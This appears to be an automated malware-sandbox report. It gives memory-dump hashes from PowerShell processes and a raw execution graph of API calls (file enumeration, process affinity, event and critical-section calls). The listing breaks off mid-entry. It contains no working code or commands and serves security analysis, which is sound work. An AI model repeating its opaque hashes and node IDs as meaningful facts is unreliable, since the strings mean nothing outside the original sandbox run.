                                                                                                                                                                      • Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8f6da8ea310a472e6f4db7dee09ab3bc97a0f2d24c2ad39d2699cb80b864f822
                                                                                                                                                                      • Instruction ID: 61f394e6121f8525584eb1bc629bc6c96f4688f1b75c4343152d16865e80bb5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f6da8ea310a472e6f4db7dee09ab3bc97a0f2d24c2ad39d2699cb80b864f822
                                                                                                                                                                      • Instruction Fuzzy Hash: CCC18031A08A5E9FDF98DF5CD455AAD77E1FF68300F24416AD419D7286CB34E882CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff27d33c100def991a2202ae8ee56e0af2f1777890732a1b5ef20cbd2a1f1c6
                                                                                                                                                                      • Instruction ID: 0e40aec4e6baaf9f951ab48884870b3d878ca9094434815c0376173131f65f8b
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff27d33c100def991a2202ae8ee56e0af2f1777890732a1b5ef20cbd2a1f1c6
                                                                                                                                                                      • Instruction Fuzzy Hash: 3251D036E0CA6D4FEBA8DA1CA8156BD37D1FF952A0F0801BBD05DC3192DA15AD15C391
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cd7f129083123670759695ce236956dbb17996f95b524389f25fd352a8ffaa47
                                                                                                                                                                      • Instruction ID: a7e01d42c979a62e52f3b4b2501cebb47a22af0f387d07825641e2c9bff3abff
                                                                                                                                                                      • Opcode Fuzzy Hash: cd7f129083123670759695ce236956dbb17996f95b524389f25fd352a8ffaa47
                                                                                                                                                                      • Instruction Fuzzy Hash: B4510126B0DA6E0FEBA9DA1C645127C37D2FFC52A0F4901BBC06EC7192CE25E815C352
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3e9a81214c54cbc1243883b40537f5d77d4afd61816875674338b4fd253ef167
                                                                                                                                                                      • Instruction ID: 3c023ff3352597cb924d751ef156a1e3bd1df0b40152b0df0c58d06d5b221d3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 3e9a81214c54cbc1243883b40537f5d77d4afd61816875674338b4fd253ef167
                                                                                                                                                                      • Instruction Fuzzy Hash: E931903191CB4C9FDB189B4C984A6AD7BE0FBA8321F00422FE459D3252DB70A8558BC2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 78545f2b996e834b4d83696c44e191dc6d8461292cacf1d7dfec5756a8290889
                                                                                                                                                                      • Instruction ID: 0ba927594bba8f3023ba5354abc4a9f2420617da6222b031f8c7002502e37dbb
                                                                                                                                                                      • Opcode Fuzzy Hash: 78545f2b996e834b4d83696c44e191dc6d8461292cacf1d7dfec5756a8290889
                                                                                                                                                                      • Instruction Fuzzy Hash: 5731BF2AB0DA6B4FEBB9DA18645113C26D1FFC5290F9D01BBC06DC7192CE28E910C352
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f9cacb73bab619b6449c8b850f09e44cc9c4f9a94daf3b3960dd9ee138001bdd
                                                                                                                                                                      • Instruction ID: 4d575bd8b9897f57fae7f04d2b0d81e1b06d2a08007771cd5527862b7e8917c9
                                                                                                                                                                      • Opcode Fuzzy Hash: f9cacb73bab619b6449c8b850f09e44cc9c4f9a94daf3b3960dd9ee138001bdd
                                                                                                                                                                      • Instruction Fuzzy Hash: FF11BC36E0D9AA4FE6B5DA18A4609BC66D0FF852A0F4901BBD06DC7092D919AD24C361
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dcc33d4d49d4dfc0f78d8b6d200cd766edcce86ce717b4eb2af09faad1a86dfd
• Instruction ID: 3374eb148f6c064954ed6c353bab9667d28b59ea4ce6d28c2a4843fe25b51521
• Opcode Fuzzy Hash: dcc33d4d49d4dfc0f78d8b6d200cd766edcce86ce717b4eb2af09faad1a86dfd
• Instruction Fuzzy Hash: 4701677111CB0C4FD748EF0CE451AAAB7E0FB95324F10056EE59AC3651D736E891CB46
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 21a2b0703ab161f9051fe8a518d58348354e5bf80986fdfded781d40d32767a4
• Instruction ID: ce3d89cfab0b2545b1f631d821e1a952345affaee07f3e951fb16c33c53879bf
• Opcode Fuzzy Hash: 21a2b0703ab161f9051fe8a518d58348354e5bf80986fdfded781d40d32767a4
• Instruction Fuzzy Hash: 04F0307180868D8FDB45DF2888194E9BFF0FF65210B0542DBE84DCB562D765D958CBC2
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e570f86c5d9e595fdc38bd90e3f15f5a93badf67da54eafacdf75b6911775021
• Instruction ID: 2f7cca29ed90ac11b55b560b4b6eae714563e2cf9acf6583b7aae5d03727539f
• Opcode Fuzzy Hash: e570f86c5d9e595fdc38bd90e3f15f5a93badf67da54eafacdf75b6911775021
• Instruction Fuzzy Hash: 14E0EC75814A4C9F8B44EF18D8199EE77E4FB68305B01425BF81ED7160DB31EA58CBC2
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 803d86577e41ee5d4296fae9a4692b35ca4f13f27dacb7828353dd23452afaf8
• Instruction ID: 8c25434c40b5564de15b72d0e4a74aef68ec6c35fc5b9c0d7752c4f4cfcce0e4
• Opcode Fuzzy Hash: 803d86577e41ee5d4296fae9a4692b35ca4f13f27dacb7828353dd23452afaf8
• Instruction Fuzzy Hash: ADD0238770F3A6DDE2015208FCA00DD5B28FC911713250177D0984905269044807C175
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000025.00000002.224616786.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffcdfcb0000_powershell.jbxd
Similarity
• API ID:
• String ID: @X;$@nw7
• API String ID: 0-3885318253
• Opcode ID: 3a97381eebcb60c4fd402510285c79f098d07e7736fd81fee2e2b85f5325be10
• Instruction ID: 04077bbcda3f7739385364e319cfdb5d1db6c0b73e9266111ca3c3556efc65d9
• Opcode Fuzzy Hash: 3a97381eebcb60c4fd402510285c79f098d07e7736fd81fee2e2b85f5325be10
• Instruction Fuzzy Hash: 94910726B0DB9A5FE76A8A2868551BD3BE1FF86264F0801FFD05DC7093DD18AC16C351
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000025.00000002.224616786.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffcdfcb0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f55fe35eca88c73f429fb024a11134d1e8efb1a52d80ccea8eb1e871258a260a
• Instruction ID: 4463e468e092787f408bf3dc26b21c06b04719a9b5eabaf3d597c30e2f51f818
• Opcode Fuzzy Hash: f55fe35eca88c73f429fb024a11134d1e8efb1a52d80ccea8eb1e871258a260a
• Instruction Fuzzy Hash: 4C412362F1CA2D1FEBB89A2864515BC73C2FF842A0F5811BBC42EC3086ED18AC11C391
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 11c14a99e7488397c61044af53ec03b92204a4ce632ff262176def7f4d8fda6b
• Instruction ID: e0776d4361da33e682cbe00f236cd9b6041d20cba2a25b7e9ef9dc161cf51bcd
• Opcode Fuzzy Hash: 11c14a99e7488397c61044af53ec03b92204a4ce632ff262176def7f4d8fda6b
• Instruction Fuzzy Hash: EA212A31A1891D8FDF88EB58D455EED77A2FF68744F140166E409D7286CB24E882CBC1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f40ed1f7b0219315804b20afbeb60a71e74cb6dae4d0829754d8dedd3da0e3a0
• Instruction ID: 15533be65ed43c7a46aabc7ecc8ad8e0864027effe4e133012720a8978ceb578
• Opcode Fuzzy Hash: f40ed1f7b0219315804b20afbeb60a71e74cb6dae4d0829754d8dedd3da0e3a0
• Instruction Fuzzy Hash: 3001C43171D90D4FEB4CAA1CE8625B873D1EB95360B1001AED84AC7293DD22F8438786
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c4602cee4c84f07abe60de7fd657edbd04cf2a8b88b27596276fded982b80f2
• Instruction ID: f6858ce3d20c7d57526acc42eb1eeb2927518baa0a8f53c48706ea5b70729408
• Opcode Fuzzy Hash: 1c4602cee4c84f07abe60de7fd657edbd04cf2a8b88b27596276fded982b80f2
• Instruction Fuzzy Hash: DA01677111CB0C8FDB48EF4CE451AA9B7E0FB95324F10056EE58AC3651DB36E881CB45
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000025.00000002.224616786.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffcdfcb0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b95e634e27e409663f8123737ec678b1a619ad6fed09dd25f4d9670803908c3
• Instruction ID: 0fcf2bb3353a09bf58db7e6b51d9d501d9571ef56d2fe9a71cad06d0ab6c46cc
• Opcode Fuzzy Hash: 8b95e634e27e409663f8123737ec678b1a619ad6fed09dd25f4d9670803908c3
• Instruction Fuzzy Hash: 36F0C213E4D9AE0EF6B2A25828160BC66C0FF80690F4C00B7D02CC6083EC089C14C355
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 45779c0a0c5b7c17016d1882502e76f34f42524ce55d9b976144c088fdb12a28
• Instruction ID: b755216a790b9c1ca4111fffb7479087d5fab0be6c27082ea91b7dcc864ad38e
• Opcode Fuzzy Hash: 45779c0a0c5b7c17016d1882502e76f34f42524ce55d9b976144c088fdb12a28
• Instruction Fuzzy Hash: 14F0303275C6084FDB4CEA1CF8529B5B3D1E799334B00016FE48BC2657D927E8438A85
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000025.00000002.224473203.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffcdfbe0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2c49af5e8f1d357aa9f76c936d21e476c959a68a1fd6be7c1d73dd96044f49b5
• Instruction ID: 39bea8ac3b74f4e0806b568883a3e7c8520b4b35c3f15abcc2487c8616c3d6c4
• Opcode Fuzzy Hash: 2c49af5e8f1d357aa9f76c936d21e476c959a68a1fd6be7c1d73dd96044f49b5
• Instruction Fuzzy Hash: 28F0373275C6084FDB4CEA1CF4529B973D1E795320B10016EE48BC2697D927F842CA85
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:8.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                                      Total number of Nodes:1170
                                                                                                                                                                      Total number of Limit Nodes:32
39207->39254 39209 7ff6ee7368eb 39209->39142 39211 7ff6ee777a4f 39210->39211 39216 7ff6ee777a59 39210->39216 39211->39142 39212 7ff6ee777b1c 60 API calls 39212->39216 39213 7ff6ee777a7c 39291 7ff6ee77b6d0 73 API calls _Init_thread_footer 39213->39291 39216->39211 39216->39212 39216->39213 39259 7ff6ee7771fc 39216->39259 39292 7ff6ee7441b0 14 API calls 2 library calls 39216->39292 39219 7ff6ee736ee6 39218->39219 39224 7ff6ee736f5c 39218->39224 39340 7ff6ee779f64 8 API calls memcpy_s 39219->39340 39221 7ff6ee736efb 39222 7ff6ee736f2f 39221->39222 39221->39224 39222->39221 39341 7ff6ee737188 12 API calls 39222->39341 39224->39134 39226 7ff6ee776f8a 39225->39226 39227 7ff6ee776fb4 39225->39227 39226->39227 39228 7ff6ee754538 FindClose 39226->39228 39228->39226 39230 7ff6ee735742 39229->39230 39232 7ff6ee73575d 39229->39232 39230->39232 39346 7ff6ee763520 12 API calls 2 library calls 39230->39346 39342 7ff6ee763610 39232->39342 39234 7ff6ee7357fc 39234->39142 39236 7ff6ee7648bc 8 API calls 39236->39234 39237->39142 39238->39193 39239->39190 39240->39196 39242 7ff6ee736738 39241->39242 39251 7ff6ee7367a7 memcpy_s 39241->39251 39243 7ff6ee736765 39242->39243 39255 7ff6ee74ca6c 48 API calls 2 library calls 39242->39255 39244 7ff6ee736786 39243->39244 39245 7ff6ee7367e1 39243->39245 39244->39251 39257 7ff6ee74cb64 8 API calls 39244->39257 39245->39251 39258 7ff6ee74cb64 8 API calls 39245->39258 39247 7ff6ee736759 39256 7ff6ee74cb64 8 API calls 39247->39256 39251->39201 39252->39204 39253->39207 39254->39209 39255->39247 39264 7ff6ee777217 setbuf 39259->39264 39261 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39263 7ff6ee77776f 39261->39263 39263->39216 39274 7ff6ee77729c 39264->39274 39283 7ff6ee77725a 39264->39283 39285 7ff6ee7773c5 39264->39285 39300 7ff6ee754554 39264->39300 39265 7ff6ee777453 39267 7ff6ee777476 39265->39267 39268 7ff6ee777464 39265->39268 39286 7ff6ee777496 39267->39286 39297 7ff6ee754538 39267->39297 39308 7ff6ee777c38 55 API calls 3 library calls 
39268->39308 39270 7ff6ee777342 39270->39283 39287 7ff6ee777656 39270->39287 39290 7ff6ee7776ef 39270->39290 39309 7ff6ee744380 14 API calls 39270->39309 39271 7ff6ee777471 39271->39267 39275 7ff6ee7773bb 39274->39275 39277 7ff6ee77732e 39274->39277 39278 7ff6ee78a444 new 4 API calls 39275->39278 39277->39270 39279 7ff6ee77734a 39277->39279 39278->39285 39280 7ff6ee77737e 39279->39280 39279->39283 39306 7ff6ee744380 14 API calls 39279->39306 39280->39283 39307 7ff6ee74cbd0 75 API calls 39280->39307 39281 7ff6ee754554 16 API calls 39281->39283 39283->39261 39293 7ff6ee7545cc 39285->39293 39286->39281 39286->39283 39287->39283 39287->39287 39288 7ff6ee777723 39287->39288 39287->39290 39310 7ff6ee73c214 8 API calls 2 library calls 39288->39310 39290->39283 39311 7ff6ee758558 10 API calls 2 library calls 39290->39311 39292->39216 39294 7ff6ee7545ed 39293->39294 39295 7ff6ee7546ec 15 API calls 39294->39295 39296 7ff6ee7546b2 39294->39296 39295->39294 39296->39265 39296->39270 39298 7ff6ee754549 FindClose 39297->39298 39299 7ff6ee75454f 39297->39299 39298->39299 39299->39286 39301 7ff6ee754570 39300->39301 39302 7ff6ee754574 39301->39302 39312 7ff6ee7546ec 39301->39312 39302->39274 39305 7ff6ee75458d FindClose 39305->39302 39306->39280 39307->39283 39308->39271 39309->39287 39310->39283 39311->39283 39313 7ff6ee754705 setbuf 39312->39313 39314 7ff6ee754733 FindFirstFileW 39313->39314 39315 7ff6ee7547a4 FindNextFileW 39313->39315 39316 7ff6ee754749 39314->39316 39324 7ff6ee75478b 39314->39324 39317 7ff6ee7547ae GetLastError 39315->39317 39315->39324 39325 7ff6ee764534 39316->39325 39317->39324 39320 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39323 7ff6ee754587 39320->39323 39321 7ff6ee75477a GetLastError 39321->39324 39322 7ff6ee75475f FindFirstFileW 39322->39321 39322->39324 39323->39302 39323->39305 39324->39320 39326 7ff6ee764549 setbuf 39325->39326 39336 7ff6ee7645a2 39326->39336 39337 7ff6ee76472c CharUpperW 39326->39337 39328 7ff6ee78a610 _UnwindNestedFrames 8 API 
calls 39330 7ff6ee75475b 39328->39330 39329 7ff6ee764579 39338 7ff6ee764760 CharUpperW 39329->39338 39330->39321 39330->39322 39332 7ff6ee764592 39333 7ff6ee76459a 39332->39333 39334 7ff6ee764629 GetCurrentDirectoryW 39332->39334 39339 7ff6ee76472c CharUpperW 39333->39339 39334->39336 39336->39328 39337->39329 39338->39332 39339->39336 39340->39221 39341->39222 39343 7ff6ee763626 setbuf wcschr 39342->39343 39344 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39343->39344 39345 7ff6ee7357e1 39344->39345 39345->39234 39345->39236 39346->39232 39348 7ff6ee748919 39347->39348 39373 7ff6ee774b14 39348->39373 39350 7ff6ee748954 memcpy_s 39350->39147 39352 7ff6ee769199 39351->39352 39353 7ff6ee78a480 4 API calls 39352->39353 39354 7ff6ee7691be 39353->39354 39355 7ff6ee78a444 new 4 API calls 39354->39355 39356 7ff6ee7691cf 39355->39356 39357 7ff6ee7691e1 39356->39357 39358 7ff6ee7488dc 8 API calls 39356->39358 39359 7ff6ee78a444 new 4 API calls 39357->39359 39358->39357 39360 7ff6ee7691f7 39359->39360 39361 7ff6ee769209 39360->39361 39362 7ff6ee7488dc 8 API calls 39360->39362 39361->39149 39362->39361 39364 7ff6ee7488dc 8 API calls 39363->39364 39365 7ff6ee767063 39364->39365 39366 7ff6ee7672c0 4 API calls 39365->39366 39367 7ff6ee737325 39366->39367 39367->39152 39367->39155 39378 7ff6ee777d80 39368->39378 39374 7ff6ee774b2b 39373->39374 39375 7ff6ee774b26 39373->39375 39374->39350 39377 7ff6ee774b38 8 API calls _UnwindNestedFrames 39375->39377 39377->39374 39385 7ff6ee778094 39378->39385 39381 7ff6ee758a44 39382 7ff6ee758a5a memcpy_s 39381->39382 39389 7ff6ee77bac4 39382->39389 39386 7ff6ee77809f 39385->39386 39387 7ff6ee777ec8 68 API calls 39386->39387 39388 7ff6ee75896e 39387->39388 39388->39381 39392 7ff6ee77ba70 GetCurrentProcess GetProcessAffinityMask 39389->39392 39393 7ff6ee7589c5 39392->39393 39393->39155 39395 7ff6ee769245 39394->39395 39402 7ff6ee756194 39395->39402 39397 7ff6ee7692b1 39398 7ff6ee756194 72 API calls 39397->39398 39399 7ff6ee7692bd 39398->39399 
39400 7ff6ee756194 72 API calls 39399->39400 39401 7ff6ee7692c9 39400->39401 39403 7ff6ee7561b4 39402->39403 39406 7ff6ee7561cb 39402->39406 39407 7ff6ee77b850 72 API calls 39403->39407 39406->39397 39408->39166 39409->39167 39410->39171 39411->39175 39412->39164 39413->39168 39414->39165 39415->39179 39416 7ff6ee77bb70 39419 7ff6ee77bb80 39416->39419 39428 7ff6ee77bae8 39419->39428 39421 7ff6ee77bb79 39422 7ff6ee77bb97 39422->39421 39433 7ff6ee741690 39422->39433 39424 7ff6ee77bbc8 SetEvent 39425 7ff6ee77bbd5 LeaveCriticalSection 39424->39425 39426 7ff6ee77bae8 67 API calls 39425->39426 39426->39422 39437 7ff6ee77b974 WaitForSingleObject 39428->39437 39431 7ff6ee77bb16 EnterCriticalSection LeaveCriticalSection 39432 7ff6ee77bb12 39431->39432 39432->39422 39434 7ff6ee7416a4 39433->39434 39435 7ff6ee7416c2 EnterCriticalSection 39433->39435 39434->39435 39445 7ff6ee741180 39434->39445 39435->39424 39435->39425 39438 7ff6ee77b9b7 39437->39438 39439 7ff6ee77b986 GetLastError 39437->39439 39438->39431 39438->39432 39443 7ff6ee74ca6c 48 API calls 2 library calls 39439->39443 39441 7ff6ee77b9a6 39444 7ff6ee74ca40 61 API calls _CxxThrowException 39441->39444 39443->39441 39444->39438 39446 7ff6ee7411ab 39445->39446 39454 7ff6ee7411b0 39445->39454 39455 7ff6ee7417c8 39446->39455 39448 7ff6ee74166a 39448->39434 39449 7ff6ee766d38 216 API calls 39449->39454 39450 7ff6ee766fe8 216 API calls 39450->39454 39451 7ff6ee741080 48 API calls 39451->39454 39452 7ff6ee766e90 216 API calls 39452->39454 39453 7ff6ee7417c8 216 API calls 39453->39454 39454->39448 39454->39449 39454->39450 39454->39451 39454->39452 39454->39453 39457 7ff6ee741813 memcpy_s 39455->39457 39465 7ff6ee758328 39457->39465 39458 7ff6ee766fe8 216 API calls 39459 7ff6ee74192f 39458->39459 39459->39458 39463 7ff6ee7419db 39459->39463 39460 7ff6ee741b27 39461 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39460->39461 39462 7ff6ee741b33 39461->39462 39462->39454 39463->39460 39464 7ff6ee766fe8 216 API calls 39463->39464 
39464->39463 39466 7ff6ee75834c setbuf 39465->39466 39471 7ff6ee7581bc 39466->39471 39468 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39469 7ff6ee75853b 39468->39469 39469->39459 39470 7ff6ee7583ab memcpy_s 39470->39468 39472 7ff6ee7581d8 memcpy_s setbuf 39471->39472 39472->39472 39473 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39472->39473 39474 7ff6ee75830c 39473->39474 39474->39470 39475 7ff6ee78b0fc 39496 7ff6ee78aa8c 39475->39496 39479 7ff6ee78b123 __scrt_acquire_startup_lock 39480 7ff6ee78b148 39479->39480 39556 7ff6ee78b52c 7 API calls memcpy_s 39479->39556 39485 7ff6ee78b18a __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39480->39485 39504 7ff6ee79472c 39480->39504 39486 7ff6ee78b1f7 39485->39486 39557 7ff6ee792574 35 API calls __InternalCxxFrameHandler 39485->39557 39512 7ff6ee793fc4 39486->39512 39493 7ff6ee78b220 39558 7ff6ee78ac64 8 API calls 2 library calls 39493->39558 39495 7ff6ee78b16d 39497 7ff6ee78aaae __isa_available_init 39496->39497 39559 7ff6ee78e2f8 39497->39559 39502 7ff6ee78aab7 39502->39479 39555 7ff6ee78b52c 7 API calls memcpy_s 39502->39555 39506 7ff6ee794744 39504->39506 39505 7ff6ee78b169 39505->39495 39508 7ff6ee7946b4 39505->39508 39506->39505 39608 7ff6ee792710 39506->39608 39509 7ff6ee79470f 39508->39509 39510 7ff6ee7946f0 39508->39510 39509->39485 39510->39509 39629 7ff6ee78b0e0 39510->39629 39513 7ff6ee78b20c 39512->39513 39514 7ff6ee793fd4 39512->39514 39516 7ff6ee767e20 39513->39516 39637 7ff6ee793c84 54 API calls 39514->39637 39638 7ff6ee77b470 GetModuleHandleW 39516->39638 39522 7ff6ee767e58 SetErrorMode GetModuleHandleW 39523 7ff6ee7748cc 21 API calls 39522->39523 39524 7ff6ee767e7d 39523->39524 39525 7ff6ee773e48 137 API calls 39524->39525 39526 7ff6ee767e90 39525->39526 39527 7ff6ee743d3c 126 API calls 39526->39527 39528 7ff6ee767e9c 39527->39528 39529 7ff6ee78a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39528->39529 39530 7ff6ee767ead 39529->39530 39531 
7ff6ee767ebf 39530->39531 39532 7ff6ee743f18 70 API calls 39530->39532 39533 7ff6ee744d1c 157 API calls 39531->39533 39532->39531 39534 7ff6ee767ed6 39533->39534 39535 7ff6ee767eef 39534->39535 39536 7ff6ee746ad0 154 API calls 39534->39536 39537 7ff6ee744d1c 157 API calls 39535->39537 39538 7ff6ee767ee7 39536->39538 39539 7ff6ee767eff 39537->39539 39540 7ff6ee744e48 160 API calls 39538->39540 39541 7ff6ee767f0d 39539->39541 39543 7ff6ee767f14 39539->39543 39540->39535 39542 7ff6ee77b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39541->39542 39542->39543 39544 7ff6ee744888 58 API calls 39543->39544 39545 7ff6ee767f57 39544->39545 39546 7ff6ee744fd0 268 API calls 39545->39546 39547 7ff6ee767f5f 39546->39547 39548 7ff6ee767f9e 39547->39548 39549 7ff6ee767f8c 39547->39549 39553 7ff6ee78b684 GetModuleHandleW 39548->39553 39550 7ff6ee77b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39549->39550 39551 7ff6ee767f93 39550->39551 39551->39548 39552 7ff6ee77b57c 14 API calls 39551->39552 39552->39548 39554 7ff6ee78b698 39553->39554 39554->39493 39555->39479 39556->39480 39557->39486 39558->39495 39560 7ff6ee78e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39559->39560 39572 7ff6ee78eb08 39560->39572 39563 7ff6ee78aab3 39563->39502 39567 7ff6ee7945e4 39563->39567 39565 7ff6ee78e318 39565->39563 39579 7ff6ee78eb50 DeleteCriticalSection 39565->39579 39569 7ff6ee799d4c 39567->39569 39568 